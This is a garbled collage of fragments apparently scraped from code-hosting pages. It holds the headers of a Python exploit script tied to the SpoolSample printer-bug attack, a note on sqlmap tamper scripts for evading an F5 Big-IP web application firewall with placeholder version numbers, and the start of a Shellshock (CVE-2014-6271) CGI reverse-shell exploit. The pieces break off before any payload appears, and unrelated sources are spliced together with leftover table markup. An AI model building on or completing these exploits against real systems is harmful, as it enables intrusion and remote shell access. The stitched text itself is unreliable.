| #!/usr/bin/env python | |
| # abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample | |
| # some code from https://www.exploit-db.com/exploits/2879/ | |
| import os | |
| import sys | |
| import argparse | |
| import binascii | |
| import ConfigParser |
The below table represents results of tests launched against F5 Big-IP ASM WAF appliance in it's XX version of YY and ZZ version of XY
Below names are to be passed to the --tamper= parameter of sqlmap.
The column Violation Rating represents most dominant rating of topmost 20 Requests observed by F5 in it's Security>>Event Logs:Application:Requests view.
The scale is 0-5.
| # CVE-2014-6271 cgi-bin reverse shell | |
| # Original: http://pastebin.com/raw.php?i=166f8Rjx | |
| import httplib,urllib,sys | |
| if (len(sys.argv)<3): | |
| print "Usage: %s <host> <vulnerable CGI>" % sys.argv[0] | |
| print "Example: %s localhost /cgi-bin/test.cgi" % sys.argv[0] | |
| exit(0) | |
| conn = httplib.HTTPConnection(sys.argv[1]) |